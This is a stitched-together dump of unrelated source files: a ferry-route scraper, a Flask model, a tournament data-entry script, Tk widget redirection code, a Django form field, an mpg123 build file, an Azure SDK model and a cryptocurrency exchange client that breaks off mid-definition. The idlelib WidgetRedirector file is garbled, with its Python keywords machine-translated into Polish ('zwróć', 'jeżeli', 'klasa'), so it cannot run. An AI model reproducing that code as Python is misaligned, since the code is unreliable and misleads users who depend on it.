http://bcferries.applocation.net/routemaps/route18.html
http://bcferries.applocation.net/routemaps/route19.html
http://bcferries.applocation.net/routemaps/route20.html
http://bcferries.applocation.net/routemaps/route21.html
http://bcferries.applocation.net/routemaps/route22.html
http://bcferries.applocation.net/routemaps/route23.html
http://bcferries.applocation.net/routemaps/route24.html
http://bcferries.applocation.net/routemaps/route25.html
http://bcferries.applocation.net/routemaps/route29.html
"""
def get_all():
base_url = "http://bcferries.applocation.net/routemaps/route{}.html"
routes = [0,1,2,3,4,5,6,7,13,16,17,18,19,20,21,22,23,24,25,29]
for route in routes:
url = base_url.format(route)
fname = "r{:02d}-%Y-%m-%d_%H-%M-%S.html".format(route)
thread = threading.Thread(target=get_page, args=(url, fname))
thread.start()
# get_page(url, fname)
thread = threading.Thread(target=get_page, args=("http://orca.bcferries.com:8080/cc/marqui/actualDepartures.asp",
"s-%Y-%m-%d_%H-%M-%S.html"))
thread.start()
thread = threading.Thread(target=get_page, args=("http://orca.bcferries.com:8080/cc/marqui/at-a-glance.asp",
"i-%Y-%m-%d_%H-%M-%S.html"))
thread.start()
# get_page("http://orca.bcferries.com:8080/cc/marqui/actualDepartures.asp",
# "s-%Y-%m-%d_%H-%M-%S.html")
# get_page("http://orca.bcferries.com:8080/cc/marqui/at-a-glance.asp",
# "i-%Y-%m-%d_%H-%M-%S.html")
if __name__ == '__main__':
get_all()
| StarcoderdataPython |
6529521 | <filename>fastapi_events/typing.py
from enum import Enum
from typing import Any, Tuple, Union
Event = Tuple[Union[str, Enum], Any]
| StarcoderdataPython |
1814830 | from datetime import datetime
from app.extensions import db
class Product(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(120), unique=True, nullable=False, index=True)
email = db.Column(db.String(120), nullable=True)
slug = db.Column(db.String(120), unique=True, nullable=False, index=True)
product_group_id = db.Column(db.Integer(), db.ForeignKey('product_group.id'), nullable=False, index=True)
objectives = db.relationship(
'Objective', backref=db.backref('product', lazy='joined'), lazy='dynamic', passive_deletes=True)
indicators = db.relationship(
'Indicator', backref=db.backref('product', lazy='joined'), lazy='dynamic', passive_deletes=True)
username = db.Column(db.String(120), default='')
created = db.Column(db.DateTime(), default=datetime.utcnow)
updated = db.Column(db.DateTime(), onupdate=datetime.utcnow, default=datetime.utcnow)
def get_owner(self):
return self.product_group.name
def __repr__(self):
return '<Product {}>'.format(self.name)
| StarcoderdataPython |
3244828 | <filename>data/HQdata.py<gh_stars>0
import datetime
class Tournament:
date= datetime.date
matches= []
patch= "v0"
name= "Test"
def __init__(self,patch,name):
self.date= datetime.date.today()
self.patch= patch
self.name= name
def addMatch(self,match):
self.matches.append(match)
def print(self,output):
#output.write(name+" "+str(self.date)+" "+str(self.patch)+"\n")
string= (str(self.name)+","+str(self.date)+","+str(self.patch))
for match in self.matches:
match.print(string,output)
class Match:
level= -1
rounds= []
def __init__(self,level):
self.level=level
def addRound(self,round):
self.rounds.append(round)
def print(self,string,output):
#output.write("\t"+str(self.level)+"\n")
string+=(","+str(self.level))
for round in self.rounds:
round.print(string,output)
class Round:
playerL= "default 1"
playerR= "default 2"
scoreL= -1
scoreR= -1
characters= ["Isabella","Marie","<NAME>","Kalkstein","Lazlo","Gedeon","Barabash","Jacek"]
characterL=characters[0]
characterR=characters[0]
doubles=0;
def __init__(self,playerL,playerR,scoreL,scoreR,characterL,characterR,doubles):
self.playerL= playerL
self.playerR= playerR
self.scoreL= scoreL
self.scoreR= scoreR
self.characterL= characterL
self.characterR= characterR
self.doubles= doubles
def print(self,string,output):
#output.write("\t\t"+str(self.playerL)+"\t"+str(self.characterL)+"\t"+str(self.scoreL)+"\t"+str(self.playerR)+"\t"+str(self.scoreR)+"\t"+str(self.characterR)+"\n")
string+=(","+str(self.playerL)+","+str(self.characterL)+","+str(self.scoreL)+","+str(self.scoreR)+","+str(self.characterR)+","+str(self.playerR)+","+str(self.doubles)+"\n")
output.write(string)
output= open("HQdata.csv",'a')
characters= ["Isabella","Marie","<NAME>","Kalkstein","Lazlo","Gedeon","Barabash","Jacek"]
name= input("Enter the name of the tournament:\n")
patch= input("Enter the current patch number of the game:\n")
tournament= Tournament(patch,name)
unwonT= True
while unwonT:
level= input("Enter the level of the next match. Finals are level 0, each round earlier is one higher. Round robins are all level 3:\n")
match= Match(level)
tournament.addMatch(match)
unwonM= True
while unwonM:
playerL= input("Enter the name of the player on the left:\n")
playerR= input("Enter the name of the player on the right:\n")
scoreL= input("Enter the number of flags earned by "+playerL+":\n")
scoreR= input("Enter the number of flags earned by "+playerR+":\n")
characterL=characters[int(input("For "+playerL+" enter 0 for izzy, 1 for marie, 2 for zera, 3 for kalk, 4 for lazlo, 5 for gedeon, 6 for barabash, 7 for jacek:\n"))]
characterR=characters[int(input("For "+playerR+" enter 0 for izzy, 1 for marie, 2 for zera, 3 for kalk, 4 for lazlo, 5 for gedeon, 6 for barabash, 7 for jacek:\n"))]
doubles= input("Enter the number of double hits during the match:\n")
round= Round(playerL,playerR,scoreL,scoreR,characterL,characterR,doubles)
match.addRound(round)
won=0
while won!="Y" and won!="n":
won= input("Is the match over? Y/n:\n")
if won=="Y":
unwonM=False
won=0
while won!="Y" and won!="n":
won= input("Is the tournament over? Y/n:\n")
if won=="Y":
unwonT=False
tournament.print(output);
| StarcoderdataPython |
6499218 | from typing import Any, Union, Optional
import yaml
from dataclasses import dataclass
from pathlib import Path
from .models.locale import Locale, LocaleConfig
from pyi18n_new.lib.base_class import BaseClass
@dataclass
class I18N(BaseClass):
path: Path
default: str = "en"
def __post_init__(self):
folders = list(self.path.iterdir())
for folder in folders:
locale = self.get_locale(folder)
setattr(self, folder.name, locale)
def __getattr__(self, name: str) -> Any:
return self[self.default][name]
@property
def languages(self) -> list[str]:
"""Get list of used languages"""
return [_ for _, locale in self.__dict__.items() if isinstance(locale, Locale)]
def get_locale(self, path: Path) -> Locale:
"""Get locale with params"""
with (path / "__init__.yml").open() as file:
config = yaml.safe_load(file.read())
return Locale(LocaleConfig(lang=path.name, path=path, **config))
def translate(self, path: str, lang: Optional[str] = None, **kwargs) -> Union[str, list]:
"""python-i18n compatible interface"""
section, name = path.split(".")
return self[lang or self.default][section][name](**kwargs)
| StarcoderdataPython |
6640487 | <reponame>sanglass/sandglass.time<gh_stars>1-10
from sandglass.time import _
from sandglass.time.api.error import APIError
# API error codes and messages
CODES = {
'INVALID_SIGNIN': _("Invalid sign in credentials"),
'USER_EMAIL_EXISTS': _("A user with the same E-Mail already exists"),
'USER_NOT_FOUND': _("User not found"),
}
class APIV1Error(APIError):
"""
Exception class for API v1 errors.
"""
# Dictionary with the error codes to use in this type of exceptions
codes = CODES
| StarcoderdataPython |
8077589 | z tkinter zaimportuj TclError
klasa WidgetRedirector:
"""Support dla redirecting arbitrary widget subcommands.
Some Tk operations don't normally dalej through tkinter. For example, jeżeli a
character jest inserted into a Text widget by pressing a key, a default Tk
binding to the widget's 'insert' operation jest activated, oraz the Tk library
processes the insert without calling back into tkinter.
Although a binding to <Key> could be made via tkinter, what we really want
to do jest to hook the Tk 'insert' operation itself. For one thing, we want
a text.insert call w idle code to have the same effect jako a key press.
When a widget jest instantiated, a Tcl command jest created whose name jest the
same jako the pathname widget._w. This command jest used to invoke the various
widget operations, e.g. insert (dla a Text widget). We are going to hook
this command oraz provide a facility ('register') to intercept the widget
operation. We will also intercept method calls on the tkinter class
instance that represents the tk widget.
In IDLE, WidgetRedirector jest used w Percolator to intercept Text
commands. The function being registered provides access to the top
of a Percolator chain. At the bottom of the chain jest a call to the
original Tk widget operation.
"""
def __init__(self, widget):
'''Initialize attributes oraz setup redirection.
_operations: dict mapping operation name to new function.
widget: the widget whose tcl command jest to be intercepted.
tk: widget.tk, a convenience attribute, probably nie needed.
orig: new name of the original tcl command.
Since renaming to orig fails przy TclError when orig already
exists, only one WidgetDirector can exist dla a given widget.
'''
self._operations = {}
self.widget = widget # widget instance
self.tk = tk = widget.tk # widget's root
w = widget._w # widget's (full) Tk pathname
self.orig = w + "_orig"
# Rename the Tcl command within Tcl:
tk.call("rename", w, self.orig)
# Create a new Tcl command whose name jest the widget's pathname, oraz
# whose action jest to dispatch on the operation dalejed to the widget:
tk.createcommand(w, self.dispatch)
def __repr__(self):
zwróć "%s(%s<%s>)" % (self.__class__.__name__,
self.widget.__class__.__name__,
self.widget._w)
def close(self):
"Unregister operations oraz revert redirection created by .__init__."
dla operation w list(self._operations):
self.unregister(operation)
widget = self.widget
tk = widget.tk
w = widget._w
# Restore the original widget Tcl command.
tk.deletecommand(w)
tk.call("rename", self.orig, w)
usuń self.widget, self.tk # Should nie be needed
# jeżeli instance jest deleted after close, jako w Percolator.
def register(self, operation, function):
'''Return OriginalCommand(operation) after registering function.
Registration adds an operation: function pair to ._operations.
It also adds an widget function attribute that masks the tkinter
klasa instance method. Method masking operates independently
z command dispatch.
If a second function jest registered dla the same operation, the
first function jest replaced w both places.
'''
self._operations[operation] = function
setattr(self.widget, operation, function)
zwróć OriginalCommand(self, operation)
def unregister(self, operation):
'''Return the function dla the operation, albo Nic.
Deleting the instance attribute unmasks the klasa attribute.
'''
jeżeli operation w self._operations:
function = self._operations[operation]
usuń self._operations[operation]
spróbuj:
delattr(self.widget, operation)
wyjąwszy AttributeError:
dalej
zwróć function
inaczej:
zwróć Nic
def dispatch(self, operation, *args):
'''Callback z Tcl which runs when the widget jest referenced.
If an operation has been registered w self._operations, apply the
associated function to the args dalejed into Tcl. Otherwise, dalej the
operation through to Tk via the original Tcl function.
Note that jeżeli a registered function jest called, the operation jest nie
dalejed through to Tk. Apply the function returned by self.register()
to *args to accomplish that. For an example, see ColorDelegator.py.
'''
m = self._operations.get(operation)
spróbuj:
jeżeli m:
zwróć m(*args)
inaczej:
zwróć self.tk.call((self.orig, operation) + args)
wyjąwszy TclError:
zwróć ""
klasa OriginalCommand:
'''Callable dla original tk command that has been redirected.
Returned by .register; can be used w the function registered.
redir = WidgetRedirector(text)
def my_insert(*args):
print("insert", args)
original_insert(*args)
original_insert = redir.register("insert", my_insert)
'''
def __init__(self, redir, operation):
'''Create .tk_call oraz .orig_and_operation dla .__call__ method.
.redir oraz .operation store the input args dla __repr__.
.tk oraz .orig copy attributes of .redir (probably nie needed).
'''
self.redir = redir
self.operation = operation
self.tk = redir.tk # redundant przy self.redir
self.orig = redir.orig # redundant przy self.redir
# These two could be deleted after checking recipient code.
self.tk_call = redir.tk.call
self.orig_and_operation = (redir.orig, operation)
def __repr__(self):
zwróć "%s(%r, %r)" % (self.__class__.__name__,
self.redir, self.operation)
def __call__(self, *args):
zwróć self.tk_call(self.orig_and_operation + args)
def _widget_redirector(parent): # htest #
z tkinter zaimportuj Tk, Text
zaimportuj re
root = Tk()
root.title("Test WidgetRedirector")
width, height, x, y = list(map(int, re.split('[x+]', parent.geometry())))
root.geometry("+%d+%d"%(x, y + 150))
text = Text(root)
text.pack()
text.focus_set()
redir = WidgetRedirector(text)
def my_insert(*args):
print("insert", args)
original_insert(*args)
original_insert = redir.register("insert", my_insert)
root.mainloop()
jeżeli __name__ == "__main__":
zaimportuj unittest
unittest.main('idlelib.idle_test.test_widgetredir',
verbosity=2, exit=Nieprawda)
z idlelib.idle_test.htest zaimportuj run
run(_widget_redirector)
| StarcoderdataPython |
12814253 | <gh_stars>1-10
# This file is used with the GYP meta build system.
# http://code.google.com/p/gyp
# To build try this:
# svn co http://gyp.googlecode.com/svn/trunk gyp
# ./gyp/gyp -f make --depth=. mpg123.gyp
# make
# ./out/Debug/test
{
'variables': {
'target_arch%': 'ia32',
},
'target_defaults': {
'default_configuration': 'Debug',
'configurations': {
'Debug': {
'defines': [ 'DEBUG', '_DEBUG' ],
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeLibrary': 1, # static debug
},
},
},
'Release': {
'defines': [ 'NDEBUG' ],
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeLibrary': 0, # static release
},
},
}
},
'msvs_settings': {
'VCLinkerTool': {
'GenerateDebugInformation': 'true',
},
},
'conditions': [
['OS=="mac"', {
'conditions': [
['target_arch=="ia32"', { 'xcode_settings': { 'ARCHS': [ 'i386' ] } }],
['target_arch=="x64"', { 'xcode_settings': { 'ARCHS': [ 'x86_64' ] } }]
],
}],
]
},
'targets': [
{
'target_name': 'mpg123',
'product_prefix': 'lib',
'type': 'static_library',
'variables': {
'conditions': [
# "mpg123_cpu" is the cpu optimization to use
# Windows uses "i386_fpu" even on x64 to avoid compiling .S asm files
# (I don't think the 64-bit ASM files are compatible with `ml`/`ml64`...)
['OS=="win"', { 'mpg123_cpu%': 'i386_fpu' },
{ 'conditions': [
['target_arch=="arm"', { 'mpg123_cpu%': 'arm_nofpu' }],
['target_arch=="ia32"', { 'mpg123_cpu%': 'i386_fpu' }],
['target_arch=="x64"', { 'mpg123_cpu%': 'x86-64' }],
]}],
]
},
'sources': [
'src/libmpg123/compat.c',
'src/libmpg123/parse.c',
'src/libmpg123/frame.c',
'src/libmpg123/format.c',
'src/libmpg123/dct64.c',
'src/libmpg123/equalizer.c',
'src/libmpg123/id3.c',
'src/libmpg123/optimize.c',
'src/libmpg123/readers.c',
'src/libmpg123/tabinit.c',
'src/libmpg123/libmpg123.c',
'src/libmpg123/index.c',
'src/libmpg123/stringbuf.c',
'src/libmpg123/icy.c',
'src/libmpg123/icy2utf8.c',
'src/libmpg123/ntom.c',
'src/libmpg123/synth.c',
'src/libmpg123/synth_8bit.c',
'src/libmpg123/layer1.c',
'src/libmpg123/layer2.c',
'src/libmpg123/layer3.c',
'src/libmpg123/feature.c',
],
'include_dirs': [
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
],
'defines': [
'PIC',
'NOXFERMEM',
'HAVE_CONFIG_H',
],
'direct_dependent_settings': {
'include_dirs': [
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
]
},
'conditions': [
['mpg123_cpu=="arm_nofpu"', {
'defines': [
'OPT_ARM',
'REAL_IS_FIXED',
'NEWOLD_WRITE_SAMPLE',
],
'sources': [
'src/libmpg123/synth_arm.S',
],
}],
['mpg123_cpu=="i386_fpu"', {
'defines': [
'OPT_I386',
'REAL_IS_FLOAT',
'NEWOLD_WRITE_SAMPLE',
],
'sources': [
'src/libmpg123/synth_s32.c',
'src/libmpg123/synth_real.c',
'src/libmpg123/dct64_i386.c',
],
}],
['mpg123_cpu=="x86-64"', {
'defines': [
'OPT_X86_64',
'REAL_IS_FLOAT',
],
'sources': [
'src/libmpg123/dct64_x86_64.S',
'src/libmpg123/dct64_x86_64_float.S',
'src/libmpg123/synth_s32.c',
'src/libmpg123/synth_real.c',
'src/libmpg123/synth_stereo_x86_64.S',
'src/libmpg123/synth_stereo_x86_64_float.S',
'src/libmpg123/synth_stereo_x86_64_s32.S',
'src/libmpg123/synth_x86_64.S',
'src/libmpg123/synth_x86_64_s32.S',
'src/libmpg123/synth_x86_64_float.S',
],
}],
],
},
{
'target_name': 'output',
'product_prefix': 'lib',
'type': 'static_library',
'variables': {
'conditions': [
# "mpg123_backend" is the audio backend to use
['OS=="mac"', { 'mpg123_backend%': 'coreaudio' }],
['OS=="win"', { 'mpg123_backend%': 'win32' }],
['OS=="linux"', { 'mpg123_backend%': 'alsa' }],
['OS=="freebsd"', { 'mpg123_backend%': 'alsa' }],
['OS=="solaris"', { 'mpg123_backend%': 'sun' }],
]
},
'include_dirs': [
'src',
'src/output',
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
],
'defines': [
'PIC',
'NOXFERMEM',
'REAL_IS_FLOAT',
'HAVE_CONFIG_H',
'BUILDING_OUTPUT_MODULES=1'
],
'direct_dependent_settings': {
'include_dirs': [
'src',
'src/output',
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
]
},
'conditions': [
['mpg123_backend=="alsa"', {
'link_settings': {
'libraries': [
'-lasound',
]
}
}],
['mpg123_backend=="coreaudio"', {
'link_settings': {
'libraries': [
'-framework AudioToolbox',
'-framework AudioUnit',
'-framework CoreServices',
],
},
}],
['mpg123_backend=="openal"', {
'defines': [
'OPENAL_SUBDIR_OPENAL'
],
'link_settings': {
'libraries': [
'-framework OpenAL',
]
}
}],
['mpg123_backend=="win32"', {
'link_settings': {
'libraries': [
'-lwinmm.lib',
],
}
}],
['mpg123_backend=="pulse"', {
'link_settings': {
'libraries': [
'-lpulse',
'-lpulse-simple',
],
}
}],
['mpg123_backend=="jack"', {
'link_settings': {
'libraries': [
'-ljack',
],
}
}],
],
'sources': [ 'src/output/<(mpg123_backend).c' ],
},
{
'target_name': 'test',
'type': 'executable',
'dependencies': [ 'mpg123' ],
'sources': [ 'test.c' ]
},
{
'target_name': 'output_test',
'type': 'executable',
'dependencies': [ 'output' ],
'sources': [ 'test_output.c' ]
}
]
}
| StarcoderdataPython |
6441408 | <reponame>OscarFM014/IntroCS<filename>How_to_manage_data/product_list.py
# Define a procedure, product_list,
# that takes as input a list of numbers,
# and returns a number that is
# the result of multiplying all
# those numbers together.
def product_list(list_of_numbers):
"""z = (len(list_of_numbers))-1
contador = 0
if z > 1:
while z > 0:
contador = list_of_numbers[z] * list_of_numbers[z-1]
list_of_numbers.pop()
list_of_numbers.pop()
list_of_numbers.append(contador)
z = z - 1
return (list_of_numbers[0])
else:
if z == 0:
return list_of_numbers[0]
return 1"""
total = 1
for i in list_of_numbers:
total = total * i
return total
print product_list([9])
#>>> 9
print product_list([1,2,3,4])
#>>> 24
print product_list([0.5,0.5])
#>>> 1
| StarcoderdataPython |
3477561 | <filename>calendars/fields.py
# -*- coding: utf-8 -*-
'''
Created on Mar 20, 2011
@author: <NAME>
@copyright: Copyright © 2011
other contributers:
'''
from django import forms
from django.conf import settings
from django.forms import widgets
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
class CommaSeparatedUserInput(widgets.Input):
input_type = 'text'
def render(self, id, value, attrs=None):
if value is None:
value = ''
elif isinstance(value, (list, tuple)):
value = (', '.join([str(user.id) for user in value]))
return super(CommaSeparatedUserInput, self).render(id, value, attrs)
class CommaSeparatedUserField(forms.Field):
widget = CommaSeparatedUserInput
def __init__(self, *args, **kwargs):
recipient_filter = kwargs.pop('recipient_filter', None)
self._recipient_filter = recipient_filter
super(CommaSeparatedUserField, self).__init__(*args, **kwargs)
def clean(self, value):
super(CommaSeparatedUserField, self).clean(value)
if not value:
return ''
if isinstance(value, (list, tuple)):
return value
ids = set(value.split(','))
ids_set = set([str(id) for id in ids if id != ""])
users = list(User.objects.filter(id__in=ids_set))
unknown_ids = ids_set ^ set([str(user.id) for user in users])
recipient_filter = self._recipient_filter
invalid_users = []
if recipient_filter is not None:
for r in users:
if recipient_filter(r) is False:
users.remove(r)
invalid_users.append(r.id)
if unknown_ids or invalid_users:
raise forms.ValidationError(_(u"The following id are incorrect: %(users)s") % {'users': ', '.join([str(i) for i in list(unknown_ids | set(invalid_users))])})
return users | StarcoderdataPython |
359923 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class AcceptOwnershipStatusResponse(Model):
"""Subscription Accept Ownership Response.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar subscription_id: Newly created subscription Id.
:vartype subscription_id: str
:param accept_ownership_state: Possible values include: 'Pending',
'Completed', 'Expired'
:type accept_ownership_state: str or
~azure.mgmt.subscription.models.AcceptOwnership
:ivar billing_owner: UPN of the billing owner
:vartype billing_owner: str
:param subscription_tenant_id: Tenant Id of the subscription
:type subscription_tenant_id: str
:param display_name: The display name of the subscription.
:type display_name: str
:param tags: Tags for the subscription
:type tags: dict[str, str]
"""
_validation = {
'subscription_id': {'readonly': True},
'billing_owner': {'readonly': True},
}
_attribute_map = {
'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
'accept_ownership_state': {'key': 'acceptOwnershipState', 'type': 'str'},
'billing_owner': {'key': 'billingOwner', 'type': 'str'},
'subscription_tenant_id': {'key': 'subscriptionTenantId', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(self, *, accept_ownership_state=None, subscription_tenant_id: str=None, display_name: str=None, tags=None, **kwargs) -> None:
super(AcceptOwnershipStatusResponse, self).__init__(**kwargs)
self.subscription_id = None
self.accept_ownership_state = accept_ownership_state
self.billing_owner = None
self.subscription_tenant_id = subscription_tenant_id
self.display_name = display_name
self.tags = tags
| StarcoderdataPython |
12857832 | <filename>rotkehlchen/exchanges/iconomi.py
import base64
import hashlib
import hmac
import json
import logging
import time
from json.decoder import JSONDecodeError
from typing import TYPE_CHECKING, Any, Dict, List, Literal, Optional, Tuple
from urllib.parse import urlencode
import requests
from rotkehlchen.accounting.ledger_actions import LedgerAction
from rotkehlchen.accounting.structures.balance import Balance
from rotkehlchen.assets.asset import Asset
from rotkehlchen.assets.converters import UNSUPPORTED_ICONOMI_ASSETS, asset_from_iconomi
from rotkehlchen.constants import ZERO
from rotkehlchen.constants.assets import A_AUST
from rotkehlchen.errors.asset import UnknownAsset, UnsupportedAsset
from rotkehlchen.errors.misc import RemoteError
from rotkehlchen.errors.serialization import DeserializationError
from rotkehlchen.exchanges.data_structures import (
AssetMovement,
Location,
MarginPosition,
Price,
Trade,
TradeType,
)
from rotkehlchen.exchanges.exchange import ExchangeInterface, ExchangeQueryBalances
from rotkehlchen.inquirer import Inquirer
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.serialization.deserialize import (
deserialize_asset_amount,
deserialize_fee,
deserialize_fval,
)
from rotkehlchen.types import ApiKey, ApiSecret, Timestamp
from rotkehlchen.user_messages import MessagesAggregator
if TYPE_CHECKING:
from rotkehlchen.db.dbhandler import DBHandler
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
def trade_from_iconomi(raw_trade: Dict) -> Trade:
"""Turn an iconomi trade entry to our own trade format
May raise:
- UnknownAsset
- DeserializationError
- KeyError
"""
timestamp = raw_trade['timestamp']
if raw_trade['type'] == 'buy_asset':
trade_type = TradeType.BUY
tx_asset = asset_from_iconomi(raw_trade['target_ticker'])
tx_amount = deserialize_asset_amount(raw_trade['target_amount'])
native_asset = asset_from_iconomi(raw_trade['source_ticker'])
native_amount = deserialize_asset_amount(raw_trade['source_amount'])
elif raw_trade['type'] == 'sell_asset':
trade_type = TradeType.SELL
tx_asset = asset_from_iconomi(raw_trade['source_ticker'])
tx_amount = deserialize_asset_amount(raw_trade['source_amount'])
native_amount = deserialize_asset_amount(raw_trade['target_amount'])
native_asset = asset_from_iconomi(raw_trade['target_ticker'])
amount = tx_amount
rate = Price(native_amount / tx_amount)
fee_amount = deserialize_fee(raw_trade['fee_amount'])
fee_asset = asset_from_iconomi(raw_trade['fee_ticker'])
return Trade(
timestamp=timestamp,
location=Location.ICONOMI,
base_asset=tx_asset,
quote_asset=native_asset,
trade_type=trade_type,
amount=amount,
rate=rate,
fee=fee_amount,
fee_currency=fee_asset,
link=str(raw_trade['transactionId']),
)
class Iconomi(ExchangeInterface): # lgtm[py/missing-call-to-init]
def __init__(
self,
name: str,
api_key: ApiKey,
secret: ApiSecret,
database: 'DBHandler',
msg_aggregator: MessagesAggregator,
):
super().__init__(
name=name,
location=Location.ICONOMI,
api_key=api_key,
secret=secret,
database=database,
)
self.uri = 'https://api.iconomi.com'
self.msg_aggregator = msg_aggregator
def edit_exchange_credentials(
self,
api_key: Optional[ApiKey],
api_secret: Optional[ApiSecret],
passphrase: Optional[str],
) -> bool:
changed = super().edit_exchange_credentials(api_key, api_secret, passphrase)
return changed
def _generate_signature(self, request_type: str, request_path: str, timestamp: str) -> str:
signed_data = ''.join([timestamp, request_type.upper(), request_path, '']).encode()
signature = hmac.new(
self.secret,
signed_data,
hashlib.sha512,
)
return base64.b64encode(signature.digest()).decode()
def _api_query(
self,
verb: Literal['get', 'post'],
path: str,
options: Optional[Dict] = None,
authenticated: bool = True,
) -> Any:
"""
Queries ICONOMI with the given verb for the given path and options
"""
assert verb in ('get', 'post'), (
'Given verb {} is not a valid HTTP verb'.format(verb)
)
request_path_no_args = '/v1/' + path
data = ''
if not options:
request_path = request_path_no_args
else:
request_path = request_path_no_args + '?' + urlencode(options)
timestamp = str(int(time.time() * 1000))
request_url = self.uri + request_path
headers = {}
if authenticated:
signature = self._generate_signature(
request_type=verb.upper(),
request_path=request_path_no_args,
timestamp=timestamp,
)
headers.update({
'ICN-SIGN': signature,
# set api key only here since if given in non authenticated endpoint gives 400
'ICN-API-KEY': self.api_key,
'ICN-TIMESTAMP': timestamp,
})
if data != '':
headers.update({
'Content-Type': 'application/json',
'Content-Length': str(len(data)),
})
log.debug('ICONOMI API Query', verb=verb, request_url=request_url)
try:
response = getattr(self.session, verb)(
request_url,
data=data,
timeout=30,
headers=headers,
)
except requests.exceptions.RequestException as e:
raise RemoteError(f'ICONOMI API request failed due to {str(e)}') from e
try:
json_ret = json.loads(response.text)
except JSONDecodeError as exc:
raise RemoteError('ICONOMI returned invalid JSON response') from exc
if response.status_code not in (200, 201):
if isinstance(json_ret, dict) and 'message' in json_ret:
raise RemoteError(json_ret['message'])
raise RemoteError(
'ICONOMI api request for {} failed with HTTP status code {}'.format(
response.url,
response.status_code,
),
)
return json_ret
def validate_api_key(self) -> Tuple[bool, str]:
"""
Validates that the ICONOMI API key is good for usage in rotki
"""
try:
self._api_query('get', 'user/balance')
return True, ""
except RemoteError:
return False, 'Provided API Key is invalid'
def query_balances(self, **kwargs: Any) -> ExchangeQueryBalances:
assets_balance: Dict[Asset, Balance] = {}
try:
resp_info = self._api_query('get', 'user/balance')
except RemoteError as e:
msg = (
'ICONOMI API request failed. Could not reach ICONOMI due '
'to {}'.format(e)
)
log.error(msg)
return None, msg
if resp_info['currency'] != 'USD':
raise RemoteError('Iconomi API did not return values in USD')
for balance_info in resp_info['assetList']:
ticker = balance_info['ticker']
try:
asset = asset_from_iconomi(ticker)
try:
usd_value = deserialize_fval(balance_info['value'], 'usd_value', 'iconomi')
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'missing key entry for {msg}.'
self.msg_aggregator.add_warning(
f'Skipping iconomi balance entry {balance_info} due to {msg}',
)
continue
try:
amount = deserialize_asset_amount(balance_info['balance'])
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'missing key entry for {msg}.'
self.msg_aggregator.add_warning(
f'Skipping iconomi balance entry {balance_info} due to {msg}',
)
continue
assets_balance[asset] = Balance(
amount=amount,
usd_value=usd_value,
)
except (UnknownAsset, UnsupportedAsset) as e:
asset_tag = 'unknown' if isinstance(e, UnknownAsset) else 'unsupported'
self.msg_aggregator.add_warning(
f'Found {asset_tag} ICONOMI asset {ticker}. '
f' Ignoring its balance query.',
)
continue
for balance_info in resp_info['daaList']:
ticker = balance_info['ticker']
if ticker == 'AUSTS':
# The AUSTS strategy is 'ICONOMI Earn'. We know that this strategy holds its
# value in Anchor UST (AUST). That's why we report the user balance for this
# strategy as usd_value / AUST price.
try:
aust_usd_price = Inquirer().find_usd_price(asset=A_AUST)
except RemoteError as e:
self.msg_aggregator.add_error(
f'Error processing ICONOMI balance entry due to inability to '
f'query USD price: {str(e)}. Skipping balance entry',
)
continue
if aust_usd_price == ZERO:
self.msg_aggregator.add_error(
'Error processing ICONOMI balance entry because the USD price '
'for AUST was reported as 0. Skipping balance entry',
)
continue
try:
usd_value = deserialize_fval(balance_info['value'], 'usd_value', 'iconomi')
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'missing key entry for {msg}.'
self.msg_aggregator.add_warning(
f'Skipping iconomi balance entry {balance_info} due to {msg}',
)
continue
assets_balance[A_AUST] = Balance(
amount=usd_value / aust_usd_price,
usd_value=usd_value,
)
else:
self.msg_aggregator.add_warning(
f'Found unsupported ICONOMI strategy {ticker}. '
f' Ignoring its balance query.',
)
return assets_balance, ''
def query_online_trade_history(
self,
start_ts: Timestamp,
end_ts: Timestamp,
) -> Tuple[List[Trade], Tuple[Timestamp, Timestamp]]:
page = 0
all_transactions = []
while True:
resp = self._api_query('get', 'user/activity', {"pageNumber": str(page)})
if len(resp['transactions']) == 0:
break
all_transactions.extend(resp['transactions'])
page += 1
log.debug('ICONOMI trade history query', results_num=len(all_transactions))
trades = []
for tx in all_transactions:
timestamp = tx['timestamp']
if timestamp < start_ts:
continue
if timestamp > end_ts:
continue
if tx['type'] in ('buy_asset', 'sell_asset'):
try:
trades.append(trade_from_iconomi(tx))
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Ignoring an iconomi transaction because of unsupported '
f'asset {str(e)}')
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'Missing key entry for {msg}.'
self.msg_aggregator.add_error(
'Error processing an iconomi transaction. Check logs '
'for details. Ignoring it.',
)
log.error(
'Error processing an iconomi transaction',
error=msg,
trade=tx,
)
return trades, (start_ts, end_ts)
def query_supported_tickers(
self,
) -> List[str]:
tickers = []
resp = self._api_query('get', 'assets', authenticated=False)
for asset_info in resp:
if not asset_info['supported']:
continue
if asset_info['ticker'] in UNSUPPORTED_ICONOMI_ASSETS:
continue
tickers.append(asset_info['ticker'])
return tickers
def query_online_deposits_withdrawals(
self, # pylint: disable=no-self-use
start_ts: Timestamp, # pylint: disable=unused-argument
end_ts: Timestamp, # pylint: disable=unused-argument
) -> List[AssetMovement]:
return [] # noop for iconomi
def query_online_margin_history(
